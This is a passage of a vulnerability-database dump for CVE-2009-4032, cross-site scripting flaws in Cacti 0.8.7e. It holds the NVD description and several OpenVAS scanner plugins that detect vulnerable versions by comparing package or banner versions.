"a2a5904218b16c94aeebec7041709bcd"}, {"key": "sourceData", "hash": "4671876a5b3a1d8beabf7c805d0d951d"}, {"key": "title", "hash": "32449658bfe7af4c84f88efc4f6cd90c"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "0e027ae68b653589cef06ee15e0735c0b3a29084fdde90bdee512176ec873ab4", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4032"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22850", "SECURITYVULNS:DOC:22951"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231066584", "OPENVAS:66584", "OPENVAS:66300", "OPENVAS:136141256231066300", "OPENVAS:861611", "OPENVAS:100361", "OPENVAS:1361412562310861611", "OPENVAS:136141256231066592", "OPENVAS:66592", "OPENVAS:831138"]}, {"type": "nessus", "idList": ["FEDORA_2009-12575.NASL", "FREEBSD_PKG_04104985D84611DE84E400215AF774F0.NASL", "FEDORA_2009-12560.NASL", "SUSE_11_0_CACTI-091202.NASL", "DEBIAN_DSA-1954.NASL"]}, {"type": "freebsd", "idList": ["04104985-D846-11DE-84E4-00215AF774F0"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83264"]}, {"type": "jvn", "idList": ["JVN:09758120"]}, {"type": "exploitdb", "idList": ["EDB-ID:33374", "EDB-ID:10234"]}, {"type": "seebug", "idList": ["SSV:18336", "SSV:15105"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1954-1:7A11F"]}], "modified": "2019-05-29T18:40:20"}, "score": {"value": 6.3, "vector": "NONE", "modified": "2019-05-29T18:40:20"}, "vulnersScore": 6.3}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: cacti_37109.nasl 14031 2019-03-07 10:47:29Z cfischer $\n#\n# Cacti Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by 
the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cacti:cacti\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100361\");\n script_version(\"$Revision: 14031 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-07 11:47:29 +0100 (Thu, 07 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-25 11:49:08 +0100 (Wed, 25 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Cacti Multiple HTML Injection Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/37109\");\n script_xref(name:\"URL\", value:\"http://cacti.net/\");\n script_xref(name:\"URL\", value:\"http://docs.cacti.net/#cross-site_scripting_fixes\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"cacti_detect.nasl\");\n script_mandatory_keys(\"cacti/installed\");\n\n script_tag(name:\"solution\", value:\"A patch is available. 
Please see the references for details.\");\n\n script_tag(name:\"summary\", value:\"Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\n properly sanitize user-supplied input before using it in dynamically generated content.\");\n\n script_tag(name:\"impact\", value:\"Attacker-supplied HTML and script code would run in the context of the affected\n browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the\n site is rendered to the user. Other attacks are also possible.\");\n\n script_tag(name:\"affected\", value:\"Cacti 0.8.7e is vulnerable. Other versions may be affected as well.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!vers = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: vers, test_version: \"0.8.7e\")) {\n report = report_fixed_ver(installed_version: vers, fixed_version: \"See references\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);", "naslFamily": "Web application abuses", "pluginID": "1361412562310100361", "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:10:01", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.7e allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) graph.php, (2) include/top_graph_header.php, (3) lib/html_form.php, and (4) lib/timespan_settings.php, as demonstrated by the (a) graph_end or (b) graph_start parameters to graph.php; (c) the date1 parameter in a tree action to graph_view.php; and the (d) page_refresh and (e) default_dual_pane_width parameters to graph_settings.php.", "modified": "2018-10-10T19:48:00", "id": "CVE-2009-4032", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4032", "published": "2009-11-29T13:07:00", "title": "CVE-2009-4032", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2018-04-06T11:39:48", "bulletinFamily": "scanner", "description": "The remote host is missing an update to cacti\nannounced via advisory FEDORA-2009-12575.", "modified": "2018-04-06T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066584", "id": "OPENVAS:136141256231066584", "title": "Fedora Core 11 FEDORA-2009-12575 (cacti)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_12575.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-12575 (cacti)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis fix contains several official patches from cacti:\n Command Line Add Graphs Syntax\n SNMP Invalid Responses \n Template Import/Export Duplication\n Cross-Site Scripting Fixes\nhttp://www.cacti.net/download_patches.php\n\nChangeLog:\n\n* Tue Dec 1 2009 Mike McGrath - 0.8.7e-3\n- Pulling in some official patches\n- #541279\n- #541962\n* Sun Aug 16 2009 Mike McGrath - 0.8.7e-1\n- Upstream released new version\n* Fri Jul 24 2009 Fedora Release Engineering - 0.8.7d-4\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update cacti' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-12575\";\ntag_summary = \"The remote host is missing an update to cacti\nannounced via advisory FEDORA-2009-12575.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66584\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Core 11 FEDORA-2009-12575 (cacti)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=541279\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"cacti\", rpm:\"cacti~0.8.7e~3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:55", "bulletinFamily": "scanner", "description": "The remote host is missing an update to cacti\nannounced via advisory FEDORA-2009-12575.", "modified": "2017-07-10T00:00:00", "published": "2009-12-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66584", "id": "OPENVAS:66584", "title": "Fedora Core 11 FEDORA-2009-12575 (cacti)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_12575.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-12575 (cacti)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis fix contains several official patches from cacti:\n Command Line Add Graphs Syntax\n SNMP Invalid Responses \n Template Import/Export Duplication\n Cross-Site Scripting Fixes\nhttp://www.cacti.net/download_patches.php\n\nChangeLog:\n\n* Tue Dec 1 2009 Mike McGrath - 0.8.7e-3\n- Pulling in some official patches\n- #541279\n- #541962\n* Sun Aug 16 2009 Mike McGrath - 0.8.7e-1\n- Upstream released new version\n* Fri Jul 24 2009 Fedora Release Engineering - 0.8.7d-4\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update cacti' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-12575\";\ntag_summary = \"The remote host is missing an update to cacti\nannounced via advisory FEDORA-2009-12575.\";\n\n\n\nif(description)\n{\n script_id(66584);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Fedora Core 11 FEDORA-2009-12575 (cacti)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=541279\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"cacti\", rpm:\"cacti~0.8.7e~3.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:13:48", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-21T00:00:00", "published": "2009-11-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66300", "id": "OPENVAS:66300", "title": "FreeBSD Ports: cacti", "type": "openvas", "sourceData": "#\n#VID 04104985-d846-11de-84e4-00215af774f0\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 04104985-d846-11de-84e4-00215af774f0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: cacti\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://docs.cacti.net/#cross-site_scripting_fixes\nhttp://www.vuxml.org/freebsd/04104985-d846-11de-84e4-00215af774f0.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(66300);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 4824 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-21 09:49:38 +0100 (Wed, 21 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-23 20:51:51 +0100 (Mon, 23 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_name(\"FreeBSD Ports: cacti\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"cacti\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.8.7e4\")<0) {\n txt += 'Package cacti version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-12-21T11:33:07", "bulletinFamily": "scanner", "description": "Check for the Version of cacti", "modified": "2017-12-21T00:00:00", "published": "2010-01-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861611", "id": "OPENVAS:861611", "title": "Fedora Update for cacti FEDORA-2009-12560", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cacti FEDORA-2009-12560\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"cacti on Fedora 12\";\ntag_insight = \"Cacti is a complete frontend to RRDTool. It stores all of the\n necessary information to create graphs and populate them with\n data in a MySQL database. The frontend is completely PHP\n driven. Along with being able to maintain graphs, data\n sources, and round robin archives in a database, Cacti also\n handles the data gathering. There is SNMP support for those\n used to creating traffic graphs with MRTG.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2010-January/msg00166.html\");\n script_id(861611);\n script_version(\"$Revision: 8205 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2009-12560\");\n script_cve_id(\"CVE-2009-4032\");\n script_name(\"Fedora Update for cacti FEDORA-2009-12560\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of cacti\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"cacti\", rpm:\"cacti~0.8.7e~3.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-19T15:05:06", "bulletinFamily": "scanner", "description": "Check for the Version of cacti", "modified": "2018-01-18T00:00:00", "published": "2010-01-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861611", "id": "OPENVAS:1361412562310861611", "type": "openvas", "title": "Fedora Update for cacti FEDORA-2009-12560", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for cacti FEDORA-2009-12560\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"cacti on Fedora 12\";\ntag_insight = \"Cacti is a complete frontend to RRDTool. It stores all of the\n necessary information to create graphs and populate them with\n data in a MySQL database. The frontend is completely PHP\n driven. Along with being able to maintain graphs, data\n sources, and round robin archives in a database, Cacti also\n handles the data gathering. There is SNMP support for those\n used to creating traffic graphs with MRTG.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2010-January/msg00166.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861611\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2009-12560\");\n script_cve_id(\"CVE-2009-4032\");\n script_name(\"Fedora Update for cacti FEDORA-2009-12560\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of cacti\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n 
script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"cacti\", rpm:\"cacti~0.8.7e~3.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-02T21:14:01", "bulletinFamily": "scanner", "description": "Cacti is prone to multiple HTML-injection vulnerabilities because it\nfails to properly sanitize user-supplied input before using it in\ndynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the\naffected browser, potentially allowing the attacker to steal cookie-\nbased authentication credentials or to control how the site is\nrendered to the user. 
Other attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.", "modified": "2016-11-18T00:00:00", "published": "2009-11-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=100361", "id": "OPENVAS:100361", "title": "Cacti Multiple HTML Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: cacti_37109.nasl 4574 2016-11-18 13:36:58Z teissa $\n#\n# Cacti Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Cacti is prone to multiple HTML-injection vulnerabilities because it\nfails to properly sanitize user-supplied input before using it in\ndynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the\naffected browser, potentially allowing the attacker to steal cookie-\nbased authentication credentials or to control how the site is\nrendered to the user. Other attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.\";\n\n\ntag_solution = \"A patch is available. 
Please see the references for details.\";\n\nif (description)\n{\n script_id(100361);\n script_version(\"$Revision: 4574 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-11-18 14:36:58 +0100 (Fri, 18 Nov 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-25 11:49:08 +0100 (Wed, 25 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_name(\"Cacti Multiple HTML Injection Vulnerabilities\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/37109\");\n script_xref(name : \"URL\" , value : \"http://cacti.net/\");\n script_xref(name : \"URL\" , value : \"http://docs.cacti.net/#cross-site_scripting_fixes\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"cacti_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\nport = get_http_port(default:80);\nif(!get_port_state(port))exit(0);\n\nif(!can_host_php(port:port)) exit(0);\n\nif(!version = get_kb_item(string(\"www/\", port, \"/cacti\")))exit(0);\nif(!matches = eregmatch(string:version, pattern:\"^(.+) under (/.*)$\"))exit(0);\n\nvers = matches[1];\n\nif(!isnull(vers) && vers >!< \"unknown\") {\n\n if(version_is_equal(version: vers, test_version: \"0.8.7e\")) {\n security_message(port:port);\n exit(0);\n } \n\n} \n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-06T11:37:19", 
"bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-11-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066300", "id": "OPENVAS:136141256231066300", "title": "FreeBSD Ports: cacti", "type": "openvas", "sourceData": "#\n#VID 04104985-d846-11de-84e4-00215af774f0\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 04104985-d846-11de-84e4-00215af774f0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
